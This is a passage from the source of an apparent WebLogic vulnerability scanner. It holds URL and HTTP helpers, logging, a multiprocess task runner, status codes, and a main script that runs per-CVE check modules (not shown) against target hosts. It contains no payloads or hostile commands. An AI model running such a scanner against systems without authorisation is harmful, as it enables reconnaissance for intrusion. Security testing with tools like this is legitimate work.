  8 | __SCHEME_TO_PORT__ = {
  9 |     'ftp': '21',
 10 |     'ssh': '22',
 11 |     'telnet': '23',
 12 |     'tftp': '69',
 13 |     'socks4': '1080',
 14 |     'socks5': '1080',
 15 |     'http': '80',
 16 |     'pop2': '109',
 17 |     'pop3': '110',
 18 |     'sftp': '115',
 19 |     'https': '443',
 20 |     'sqlserver': '1433',
 21 |     'mysql': '3306',
 22 |     'postgresql': '5432',
 23 |     'redis': '6379',
 24 | }
 25 | 
 26 | 
 27 | class DictString(dict):
 28 |     def __setitem__(self, key, value):
 29 |         super().__setitem__(key, str(value))
 30 | 
 31 | 
 32 | class Url:
 33 |     def __init__(self, url: str):
 34 |         '''
 35 |         :param url: 需要解析的url
 36 |         https://example.com:8952/nothing.py;param1=v1;param2=v2?query1=v1&query2=v2#frag
 37 |         scheme=>https, netloc=>example.com:8952, path=>/nothing.py, params=>param1=v1;param2=v2,
 38 |         query=>query1=v1&query2=v2, fragment=>frag, hostname=>example.com, port=>8952
 39 |         '''
 40 |         self.scheme, self.netloc, self.path, self.params, self.query = '', '', '', DictString(), DictString()
 41 |         self.fragment, self.hostname, self.port, self.username, self.password = '', '', '', '', ''
 42 | 
 43 |         try:
 44 |             self.scheme, user_pass, self.netloc, self.path = re.search(
 45 |                 r'(.+)://([^\\/]*:[^\\/]*@)?([^\\/]+)(/[^;?#]*)?', url).groups()
 46 |             if not self.path:
 47 |                 self.path = '/'
 48 |             if user_pass:
 49 |                 self.username, self.password = re.search(
 50 |                     r'([^@:]+):([^@:]+)', user_pass).groups()
 51 | 
 52 |             self.hostname, self.port = re.search(
 53 |                 r'([^:]+):?(\d+)?', self.netloc).groups()
 54 |             if not self.port:
 55 |                 self.port = self.get_default_port(self.scheme)
 56 |         except AttributeError:
 57 |             raise ValueError('Incorrect URL')
 58 | 
 59 |         r = re.findall(r';([^?#]+?)=([^?#;]+)', url)
 60 |         if r:
 61 |             self.params = DictString(r)
 62 |         else:
 63 |             self.params = DictString()
 64 | 
 65 |         r = re.findall(r'[?&]([^;?#]+?)=([^?#&]*)', url)
 66 |         if r:
 67 |             self.query = DictString(r)
 68 |         else:
 69 |             self.query = DictString()
 70 | 
 71 |         r = re.search(r'#([^;?#]+)', url)
 72 |         if r:
 73 |             self.fragment = r.group(1)
 74 | 
 75 |     @classmethod
 76 |     def get_default_port(cls, scheme):
 77 |         return __SCHEME_TO_PORT__[scheme]
 78 | 
 79 |     def url_index(self):
 80 |         base = f'{self.scheme}://'
 81 |         if self.username:
 82 |             base += f'{self.username}:{self.password}@'
 83 |         base += self.netloc
 84 |         return base
 85 | 
 86 |     def url_path(self, encoded=True):
 87 |         base = self.path
 88 |         if self.params:
 89 |             for k in self.params:
 90 |                 base += f';{k}={quote(self.params[k]) if encoded else self.params[k]}'
 91 |         if self.query:
 92 |             first = True
 93 |             for k in self.query:
 94 |                 if first:
 95 |                     base += '?'
 96 |                     first = False
 97 |                 else:
 98 |                     base += f'&'
 99 |                 base += f'{k}={quote(self.query[k]) if encoded else self.query[k]}'
100 |         if self.fragment:
101 |             base += f'#{self.fragment}'
102 |         return base
103 | 
104 |     def url_full(self, encoded=True):
105 |         return self.url_index() + self.url_path(encoded)
106 | 
107 |     def __str__(self):
108 |         return f"URL(scheme={self.scheme}, netloc={self.netloc}, path={self.path}, params={self.params}, query={self.query}, fragment={self.fragment}, hostname={self.hostname}, port={self.port}, username={self.username}, password={self.password})"
109 | 
110 | 
111 | def http(url, method='GET', headers=None, params=None, data=None, verify=False, timeout=10, ssl=None, session=None) -> (
112 |         Tuple[requests.Response, None], Dict):
113 |     if not headers:
114 |         headers = {}
115 |     headers.update({'User-Agent': 'TestUA/1.0'})
116 |     nurl = Url(url)
117 |     if session == False:
118 |         session = requests
119 |     if not session:
120 |         session = requests.session()
121 |     try:
122 |         if ssl:
123 |             raise requests.exceptions.SSLError('force ssl')
124 |         nurl.scheme = 'http'
125 |         return session.request(method, nurl.url_full(), headers=headers, params=params, data=data, timeout=timeout,
126 |                                verify=verify), {'code': 0, 'message': 'request success'}
127 |     except requests.exceptions.RequestException as e:
128 |         if ssl == False:
129 |             return None, {'code': -10, 'message': e.__str__()}
130 |         try:
131 |             nurl.scheme = 'https'
132 |             return session.request(method, nurl.url_full(), headers=headers, params=params, data=data, timeout=timeout,
133 |                                    verify=verify), {'code': 0, 'message': 'request success'}
134 |         except requests.exceptions.RequestException as e:
135 |             return None, {'code': -10, 'message': e.__str__()}
136 | 


--------------------------------------------------------------------------------
/utils/logger.py:
--------------------------------------------------------------------------------
 1 | import datetime
 2 | import logging
 3 | import sys
 4 | import warnings
 5 | 
 6 | APPNAME = 'weblogicscanner'
 7 | LOG_LEVEL = logging.INFO
 8 | 
 9 | logger = logging.getLogger(APPNAME)
10 | 
11 | formatter = logging.Formatter(
12 |     '[%(asctime)s][%(levelname)s] %(message)s', datefmt='%H:%M:%S')
13 | # 文件日志
14 | file_handler = logging.FileHandler('%s_%s.log' % (APPNAME, datetime.datetime.now().strftime('%Y%m%d')),
15 |                                    encoding='utf-8')
16 | file_handler.setFormatter(formatter)
17 | logger.addHandler(file_handler)
18 | 
19 | # 控制台日志
20 | console_handler = logging.StreamHandler(sys.stdout)
21 | console_handler.formatter = formatter
22 | logger.addHandler(console_handler)
23 | 
24 | logger.setLevel(LOG_LEVEL)
25 | 
26 | warnings.filterwarnings('ignore')
27 | # fix: next warn
28 | # C:\weblogicScanner\venv\lib\site-packages\urllib3\connectionpool.py:1004: InsecureRequestWarning: Unverified HTTPS request is being made to host 'localhost'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
29 | #   InsecureRequestWarning,
30 | 


--------------------------------------------------------------------------------
/utils/process.py:
--------------------------------------------------------------------------------
  1 | import os
  2 | import random
  3 | import threading
  4 | import time
  5 | from multiprocessing import Manager, Process, Queue
  6 | from multiprocessing.managers import SyncManager
  7 | from typing import Any, Callable, Dict, List, Union
  8 | 
  9 | # 引擎正在运行中。有任务在运行
 10 | SIG_ACTI = 40
 11 | # 引擎正在休眠中。任务等待区无任务，且无运行中任务
 12 | SIG_SLEP = 30
 13 | # 状态分界线。大于0说明系统正常运行中；小于0说明系统需要即将关闭或立刻关闭，不再将等待区的任务加入多线程中运行
 14 | SIG_LINE = 0
 15 | # 列表中任务执行完成。且等待区无新任务，由 __thread_active_tasks_waiting 函数通知引擎关闭
 16 | SIG_FINI = -10
 17 | # 要求引擎停止。不再追加任务，等待正在运行的进程结束后停止引擎
 18 | SIG_STOP = -20
 19 | # 要求引擎终止。立刻终止所有线程、进程，所有执行中的进程将终止
 20 | SIG_TMNT = -30
 21 | 
 22 | KEY_STATUS = 'CURRENT_STATUS'
 23 | 
 24 | 
 25 | class AutoProcess:
 26 |     auto_end: Union[bool, int]
 27 |     auto_end_wait_time: int
 28 |     auto_end_last_time: int
 29 |     tasks_waiting: List[Process]
 30 |     tasks_running: List[Process]
 31 |     tasks_finish_number: int
 32 |     signal: int
 33 |     number: int
 34 |     __thread_active_tasks_waiting: threading.Thread
 35 |     __thread_clear_tasks_complate: threading.Thread
 36 |     activated_or_not: bool
 37 |     scan_interval: float
 38 |     __queue: SyncManager.Queue
 39 |     TASK_KEY: str
 40 | 
 41 |     def __init__(self,
 42 |                  number: int = 8,
 43 |                  auto_end: Union[bool, int] = 3,
 44 |                  scan_interval: float = 1,
 45 |                  queue: SyncManager.Queue = None) -> None:
 46 |         '''
 47 |         同步函数，等待任务执行结束退出
 48 |         number: 最大运行进程数量，该值小于0时，只要任务等待区有任务就会无限塞入任务运行区运行
 49 |         auto_end: 任务运行完后是否自动结束
 50 |         scan_interval: 扫描间隔，不建议低于1，否则线程太过占用系统资源，根据运行设备情况自定义
 51 |         '''
 52 |         self.auto_end = auto_end
 53 |         self.auto_end_last_time = time.time()
 54 |         if isinstance(auto_end, int):
 55 |             self.auto_end_wait_time = auto_end
 56 |         else:
 57 |             self.auto_end_wait_time = 30
 58 |         self.tasks_waiting = []
 59 |         self.tasks_running = []
 60 |         self.signal = SIG_SLEP
 61 |         self.number = number
 62 |         self.is_activated = False
 63 |         self.scan_interval = scan_interval
 64 |         self.tasks_finish_number = 0
 65 |         if queue:
 66 |             self.__queue = queue
 67 |         else:
 68 |             manager = Manager()
 69 |             self.__queue = manager.Queue()
 70 |         self.TASK_KEY = 'TASKID'
 71 |         self.RET_KEY = 'RETURNDATA'
 72 | 
 73 |     def __active_tasks_waiting(self):
 74 |         '''
 75 |         将任务等待区中的任务放入多线程运行，定期扫描等待区任务
 76 |         scan_interval: 扫描间隔
 77 |         '''
 78 |         while True:
 79 |             if self.signal < SIG_LINE:
 80 |                 return
 81 |             if self.auto_end and time.time() - (
 82 |                     self.auto_end_last_time +
 83 |                     self.auto_end_wait_time) > 0 and len(
 84 |                         self.tasks_waiting) == 0 and len(
 85 |                             self.tasks_running) == 0 and self.is_activated:
 86 |                 # 在自动关闭开关激活，超过自动等待时间，且等待区没有任务，且本函数已经激活过。发出任务运行完成，发出任务完成信息，退出引擎
 87 |                 self.signal = SIG_FINI
 88 |                 return
 89 |             for i in range(len(self.tasks_waiting)):
 90 |                 if self.number > 0 and len(self.tasks_running) >= self.number:
 91 |                     break
 92 |                 process = self.tasks_waiting.pop(0)
 93 |                 process.start()
 94 |                 self.tasks_running.append(process)
 95 |                 self.is_activated = True
 96 |                 self.signal = SIG_ACTI
 97 |             if len(self.tasks_waiting) == 0 and len(self.tasks_running) == 0:
 98 |                 self.signal = SIG_SLEP
 99 |             # print('__active_tasks_waiting scanning...')
100 |             # print('waiting tasks number:', len(self.tasks_waiting))
101 |             # print('current state number:', self.signal)
102 |             time.sleep(self.scan_interval)
103 | 
104 |     def __clear_tasks_complate(self):
105 |         '''
106 |         将任务运行区已完成的任务定期进行清理，定期扫描运行区任务
107 |         scan_interval: 扫描间隔
108 |         '''
109 |         while True:
110 |             for process in self.tasks_running:
111 |                 if self.signal == SIG_TMNT:
112 |                     process.kill()
113 |                     process.join()
114 |                     process.close()
115 |                 elif not process.is_alive():
116 |                     self.tasks_running.remove(process)
117 |                     if hasattr(process, 'close'):
118 |                         process.close()
119 |                     self.auto_end_last_time = time.time()
120 |                     self.tasks_finish_number += 1
121 |             if self.signal == SIG_TMNT:
122 |                 return
123 |             if self.signal < SIG_LINE and len(self.tasks_running) == 0:
124 |                 return
125 |             # print('__clear_tasks_complate scanning...')
126 |             # print('running tasks number:', len(self.tasks_running))
127 |             # print('current state number:', self.signal)
128 |             time.sleep(self.scan_interval)
129 | 
130 |     def get_return(self, queue: SyncManager.Queue = None):
131 |         '''
132 |         '''
133 |         if queue:
134 |             while not queue.empty():
135 |                 yield queue.get()
136 |         while not self.__queue.empty():
137 |             yield self.__queue.get()
138 | 
139 |     def gen_task_id(self) -> str:
140 |         return os.urandom(16).hex()
141 | 
142 |     def put_task(self,
143 |                  func: Callable,
144 |                  args: List = None,
145 |                  kwargs: Dict = None,
146 |                  queue: Union[bool, SyncManager.Queue] = False) -> str:
147 |         '''
148 |         提交待执行的任务，返回任务id
149 |         func: 要多进程运行的函数
150 |         args: 任务函数的参数
151 |         kwargs: 任务函数的kw参数
152 |         '''
153 |         if not args:
154 |             args = []
155 |         if not kwargs:
156 |             kwargs = {}
157 |         if queue and isinstance(queue, bool):
158 |             args.insert(0, self.__queue)
159 |         else:
160 |             args.insert(0, queue)
161 |         self.tasks_waiting.append(
162 |             Process(target=func, args=args, kwargs=kwargs))
163 | 
164 |     def wait(self, timeout: Union[int, None] = None):
165 |         '''
166 |         同步函数，等待任务执行结束退出
167 |         timeout: 超时结束
168 |         '''
169 |         self.__thread_active_tasks_waiting.join(timeout)
170 |         self.__thread_clear_tasks_complate.join(timeout)
171 | 
172 |     def stop(self):
173 |         '''
174 |         向引擎发出停止信号
175 |         '''
176 |         self.signal = SIG_STOP
177 | 
178 |     def terminate(self):
179 |         '''
180 |         向引擎发出终止信号
181 |         '''
182 |         self.signal = SIG_TMNT
183 | 
184 |     def run(self):
185 |         '''
186 |         该函数会将输入的函数放入线程池中进行调度，调度会把任务放入子进程中进行运行
187 |         scan_interval: 扫描间隔
188 |         '''
189 |         self.__thread_active_tasks_waiting = threading.Thread(
190 |             target=self.__active_tasks_waiting)
191 |         self.__thread_clear_tasks_complate = threading.Thread(
192 |             target=self.__clear_tasks_complate)
193 |         self.__thread_active_tasks_waiting.start()
194 |         self.__thread_clear_tasks_complate.start()
195 | 
196 | 
197 | def test_performance_func(min: int, max: int):
198 |     # print(os.getpid(), 'test_normal_func running...')
199 |     result = 0
200 |     for i in range(random.randint(min, max)):
201 |         for j in range(random.randint(min, max)):
202 |             for k in range(random.randint(min, max)):
203 |                 result += i * j * k
204 |     print(os.getpid(), 'test_normal_func result:', str(result))
205 |     # print(os.getpid(), 'test_normal_func ending...')
206 | 
207 | 
208 | def test_normal_func(min: int, max: int):
209 |     # print(os.getpid(), 'test_normal_func running...')
210 |     if random.randint(0, 1):
211 |         # 模仿部分进程执行较快，部分进程执行较慢
212 |         result = 0
213 |         for i in range(random.randint(min, max)):
214 |             for j in range(random.randint(min, max)):
215 |                 for k in range(random.randint(min, max)):
216 |                     result += i * j * k
217 |         print(os.getpid(), 'test_normal_func result:', str(result))
218 |     # print(os.getpid(), 'test_normal_func ending...')
219 | 
220 | 
221 | def test_return_func(queue: Queue, min: int, max: int):
222 |     result = 0
223 |     for i in range(random.randint(min, max)):
224 |         for j in range(random.randint(min, max)):
225 |             for k in range(random.randint(min, max)):
226 |                 result += i * j * k
227 |     # 返回数据
228 |     queue.put(result)
229 |     print(os.getpid(), 'test_return_func result:', str(result))
230 | 
231 | 
232 | if __name__ == '__main__':
233 |     '''
234 |     多进程使用要求必须把代码放在 if __name__ == '__main__' 这部分下
235 |     '''
236 |     # ----------------功能测试部分----------------
237 |     autopro = AutoProcess()
238 |     autopro.run()
239 | 
240 |     # 返回值获取测试
241 |     [
242 |         autopro.put_task(test_return_func, [100, 999], queue=True)
243 |         for i in range(8)
244 |     ]
245 |     autopro.wait()
246 |     print('current state number:', autopro.signal)
247 |     print('finish task number:', autopro.tasks_finish_number)
248 |     returndata = [i for i in autopro.get_return()]
249 |     print(len(returndata))
250 |     print(returndata)
251 | 
252 |     # # 同步等待功能测试
253 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(20)]
254 |     # autopro.wait()
255 |     # print('current state number:', autopro.signal)
256 |     # print('finish task number:', autopro.tasks_finish_number)
257 | 
258 |     # # 多次塞入任务测试
259 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(10)]
260 |     # time.sleep(20)
261 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(10)]
262 |     # time.sleep(20)
263 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(10)]
264 |     # time.sleep(20)
265 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(10)]
266 |     # autopro.wait()
267 |     # print('current state number:', autopro.signal)
268 |     # print('finish task number:', autopro.tasks_finish_number)
269 | 
270 |     # # 中途发出停止信号测试
271 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(20)]
272 |     # time.sleep(10)
273 |     # autopro.stop()
274 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(20)]
275 |     # time.sleep(10)
276 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(20)]
277 |     # autopro.wait()
278 |     # print('current state number:', autopro.signal)
279 |     # print('finish task number:', autopro.tasks_finish_number)
280 | 
281 |     # # 中途发出终止号测试
282 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(20)]
283 |     # time.sleep(10)
284 |     # autopro.terminate()
285 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(20)]
286 |     # time.sleep(10)
287 |     # [autopro.put_task(test_normal_func, (100, 999)) for i in range(20)]
288 |     # autopro.wait()
289 |     # print('current state number:', autopro.signal)
290 |     # print('finish task number:', autopro.tasks_finish_number)
291 | 
292 |     # # ----------------性能测试部分----------------
293 |     # # 性能测试，正常运行，100个任务，用于对比
294 |     # start_time_1 = time.time()
295 |     # [test_performance_func(500, 500) for i in range(100)]
296 | 
297 |     # # 性能测试，4进程，100个任务
298 |     # autopro = AutoProcess(4)
299 |     # autopro.run()
300 |     # start_time_4 = time.time()
301 |     # [autopro.put_task(test_performance_func, (500, 500)) for i in range(100)]
302 |     # autopro.wait()
303 | 
304 |     # # 性能测试，20进程，100个任务
305 |     # autopro = AutoProcess(20)
306 |     # autopro.run()
307 |     # start_time_20 = time.time()
308 |     # [autopro.put_task(test_performance_func, (500, 500)) for i in range(100)]
309 |     # autopro.wait()
310 |     # print('1线程运行：')
311 |     # print('total time(s):', time.time() - start_time_1)
312 |     # print('4线程运行：')
313 |     # print('total time(s):', time.time() - start_time_4)
314 |     # print('current state number:', autopro.signal)
315 |     # print('finish task number:', autopro.tasks_finish_number)
316 |     # print('20线程运行：')
317 |     # print('total time(s):', time.time() - start_time_20)
318 |     # print('current state number:', autopro.signal)
319 |     # print('finish task number:', autopro.tasks_finish_number)
320 | 
321 |     # # 1线程运行：
322 |     # # total time(s): 1115.9921689033508
323 |     # # 4线程运行：
324 |     # # total time(s): 343.8757131099701
325 |     # # current state number: -10
326 |     # # finish task number: 100
327 |     # # 20线程运行：
328 |     # # total time(s): 350.890340089798
329 |     # # current state number: -10
330 |     # # finish task number: 100
331 | 
332 |     # # 测试平台：
333 |     # # MacBook Pro (13-inch, 2020, Four Thunderbolt 3 ports)
334 |     # # CPU：2 GHz 四核Intel Core i5
335 |     # # 内存：16 GB 3733 MHz LPDDR4X
336 | 


--------------------------------------------------------------------------------
/utils/state.py:
--------------------------------------------------------------------------------
  1 | DEFAULT_LANG = '_lang_cn'
  2 | 
  3 | 
  4 | class BaseState:
  5 |     @classmethod
  6 |     def to_dict(cls):
  7 |         obj_dict = {}
  8 |         for n in dir(cls):
  9 |             v = getattr(cls, n)
 10 |             if n.startswith('_') or callable(v):
 11 |                 continue
 12 |             obj_dict[n] = v
 13 |         return obj_dict
 14 | 
 15 |     @classmethod
 16 |     def text(cls, value: int, lang=DEFAULT_LANG):
 17 |         if value not in cls.__dict__[lang]:
 18 |             return 'error code'
 19 |         return cls.__dict__[lang][value]
 20 | 
 21 |     @classmethod
 22 |     def group_to_dict(cls, value: int, lang=DEFAULT_LANG):
 23 |         return {'code': value, 'msg': cls.text(value, lang)}
 24 | 
 25 |     @classmethod
 26 |     def group_to_list(cls, value: int, lang=DEFAULT_LANG):
 27 |         return [value, cls.text(value, lang)]
 28 | 
 29 | 
 30 | class R(BaseState):
 31 |     '''Response Content'''
 32 |     SUCCESS = 0
 33 |     FAILED = -255
 34 |     TIMEOUT = -254
 35 |     UNKNOWN = -253
 36 |     TOO_FREQUENT = -252
 37 |     DEPRECATED = -251
 38 | 
 39 |     NOT_FOUND = -249
 40 |     ALREADY_EXISTS = -248
 41 | 
 42 |     PERMISSION_DENIED = -239
 43 |     INVALID_ROLE = -238
 44 | 
 45 |     CHECK_FAILURE = -229
 46 |     PARAM_REQUIRED = -228
 47 |     POSTDATA_REQUIRED = -227
 48 | 
 49 |     INVALID_PARAMS = -219
 50 |     INVALID_POSTDATA = -218
 51 | 
 52 |     CONNET_FAILED = -209
 53 | 
 54 |     WS_DONE = 1
 55 | 
 56 |     _lang_cn = {
 57 |         SUCCESS: '成功',
 58 |         FAILED: '失败',
 59 |         TIMEOUT: '超时',
 60 |         UNKNOWN: '未知错误',
 61 |         TOO_FREQUENT: '请求过于频繁',
 62 |         DEPRECATED: '此接口已不推荐使用',
 63 | 
 64 |         NOT_FOUND: '未找到',
 65 |         ALREADY_EXISTS: '已存在',
 66 | 
 67 |         PERMISSION_DENIED: '无权访问',
 68 |         INVALID_ROLE: '权限申请失败',
 69 | 
 70 |         CHECK_FAILURE: '校验失败',
 71 |         PARAM_REQUIRED: '缺少参数',
 72 |         POSTDATA_REQUIRED: '缺少提交内容',
 73 | 
 74 |         INVALID_PARAMS: '非法参数',
 75 |         INVALID_POSTDATA: '非法提交内容',
 76 | 
 77 |         CONNET_FAILED: '连接失败',
 78 | 
 79 |         WS_DONE: 'Websocket 请求完成'
 80 |     }
 81 | 
 82 |     _lang_en = {
 83 |         SUCCESS: 'success',
 84 |         FAILED: 'failed',
 85 |         TIMEOUT: 'timeout',
 86 |         UNKNOWN: 'unknown',
 87 |         TOO_FREQUENT: 'request too frequent',
 88 |         DEPRECATED: 'interface deprecated',
 89 | 
 90 |         NOT_FOUND: 'not found',
 91 |         ALREADY_EXISTS: 'already exists',
 92 | 
 93 |         PERMISSION_DENIED: 'permission denied',
 94 |         INVALID_ROLE: 'acquire role failed',
 95 | 
 96 |         CHECK_FAILURE: 'check failure',
 97 |         PARAM_REQUIRED: 'parameter(s) required',
 98 |         POSTDATA_REQUIRED: 'post data item(s) required',
 99 | 
100 |         INVALID_PARAMS: 'invalid parameter(s)',
101 |         INVALID_POSTDATA: 'invalid post',
102 | 
103 |         CONNET_FAILED: 'connection failed',
104 | 
105 |         WS_DONE: 'Websocket request done'
106 |     }
107 | 
108 | 
109 | if __name__ == '__main__':
110 |     print(R.to_dict())
111 |     print(R.text(R.FAILED))
112 |     print(R.group_to_dict(R.SUCCESS))
113 |     print(R.group_to_list(R.CONNET_FAILED))
114 | 


--------------------------------------------------------------------------------
/ws.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # _*_ coding:utf-8 _*_
  3 | import json
  4 | import os
  5 | import re
  6 | import time
  7 | import importlib
  8 | import traceback
  9 | 
 10 | 
 11 | import stars
 12 | # import stars._import
 13 | from utils.process import AutoProcess
 14 | 
 15 | 
 16 | if __name__ == '__main__':
 17 |     import argparse
 18 | 
 19 |     parser = argparse.ArgumentParser()
 20 |     parser.add_argument('-t', '--targets', required=True, nargs='+',
 21 |                         help='target, or targets file(default port 7001). eg. 127.0.0.1:7001')
 22 |     parser.add_argument('-v', '--vulnerability', nargs='+',
 23 |                         help='vulnerability name. eg. "CVE-2020-14750 cve_2014_4210 console"')
 24 |     parser.add_argument('-p', '--process_number', default=8,
 25 |                         type=int, help='Number of program processes(default number 8).')
 26 |     parser.add_argument('-o', '--output', required=False, type=str,
 27 |                         help='Path to json output(default without output).')
 28 |     parser.add_argument('-s', '--ssl', action='store_true',
 29 |                         help='Forcing the use of the https protocol.')
 30 |     args = parser.parse_args()
 31 | 
 32 |     s_time = time.time()
 33 |     if args.output and not os.path.isdir(args.output):
 34 |         os.makedirs(args.output)
 35 |     if not args.ssl:
 36 |         args.ssl = None
 37 | 
 38 |     # vulnerability_list = []
 39 |     # if args.vulnerability:
 40 |     #     for item in args.vulnerability:
 41 |     #         vulnerability_list.append(item.lower())
 42 |     vulnerability_list = set()
 43 |     if args.vulnerability:
 44 |         for item in args.vulnerability:
 45 |             vulnerability_list.add(item.lower().replace('-', '_'))
 46 | 
 47 |     m_target = {}
 48 |     for target in args.targets:
 49 |         t_list = []
 50 |         if os.path.isfile(target):
 51 |             with open(target) as _f:
 52 |                 for it in _f.read().split('\n'):
 53 |                     res = re.search(r'^([\w.\-]{,80})([ :](\d{,5}))?$', it)
 54 |                     if res:
 55 |                         port = res.group(3) if res.group(3) else '7001'
 56 |                         id = res.group(1) + ':' + port
 57 |                         m_target[id] = {'ip': res.group(1), 'port': port}
 58 |         else:
 59 |             res = re.search(r'^([\w.\-]{,80})([ :](\d{,5}))?$', target)
 60 |             if res:
 61 |                 port = res.group(3) if res.group(3) else '7001'
 62 |                 id = res.group(1) + ':' + port
 63 |                 m_target[id] = {'ip': res.group(1), 'port': port}
 64 | 
 65 |     autopro = AutoProcess(args.process_number)
 66 |     autopro.run()
 67 |     for filename in os.listdir('./stars'):
 68 |         re_data = re.search(r'([^\.\/\\]+)\.py', filename)
 69 |         if not re_data or filename.startswith('_'):
 70 |             continue
 71 |         script_name = re_data.group(1)
 72 |         try:
 73 |             module = importlib.import_module('.{}'.format(script_name),
 74 |                                              'stars')
 75 |             if vulnerability_list:
 76 |                 if script_name not in vulnerability_list:
 77 |                     continue
 78 |             if 'run' not in module.__dir__():
 79 |                 continue
 80 |             for key in m_target:
 81 |                 data = {
 82 |                     'IP': m_target[key]['ip'], 'PORT': m_target[key]['port'], 'IS_SSL': args.ssl}
 83 |                 autopro.put_task(module.run, [data], queue=True)
 84 |         except:
 85 |             print('ERROR:\n' + traceback.format_exc())
 86 | 
 87 |     # for key in m_target:
 88 |     #     for group_name in stars.universe.actived:
 89 |     #         for star in stars.universe.actived[group_name]:
 90 |     #             instance = star()
 91 |     #             if vulnerability_list and not (
 92 |     #                     (instance.info['CVE'] and instance.info['CVE'].lower() in vulnerability_list) or (
 93 |     #                     instance.info['NAME'] and instance.info['NAME'].lower() in vulnerability_list)):
 94 |     #                 continue
 95 |     #             res, msg = instance.light_and_msg(
 96 |     #                 m_target[key]['ip'], m_target[key]['port'], args.ssl)
 97 |     #             ikey = instance.info['CVE'] if instance.info['CVE'] else instance.info['NAME']
 98 |     #             m_target[key][ikey] = res
 99 | 
100 |     #             autopro.put_task(instance.light_and_msg, [
101 |     #                              m_target[key]['ip'], m_target[key]['port'], args.ssl], queue=True)
102 | 
103 |     while autopro.signal > 0:
104 |         for ret in autopro.get_return():
105 |             for key in m_target:
106 |                 if m_target[key]['ip'] == ret['IP'] and m_target[key]['port'] == ret['PORT']:
107 |                     name = ret['NAME']
108 |                     m_target[key][name] = ret['STATE']
109 |         time.sleep(1)
110 | 
111 |     result = {}
112 |     for target in m_target:
113 |         result[target] = {}
114 |         for key in sorted(m_target[target].keys()):
115 |             result[target][key] = m_target[target][key]
116 | 
117 |     if args.output:
118 |         with open(
119 |                 os.path.join(
120 |                     args.output, f'result_{time.strftime("%m%d_%H%M%S", time.localtime(time.time()))}.json'),
121 |                 'w') as _f:
122 |             _f.write(json.dumps(result))
123 |     print('Run completed, {} seconds total.'.format(int(time.time() - s_time)))
124 | 


--------------------------------------------------------------------------------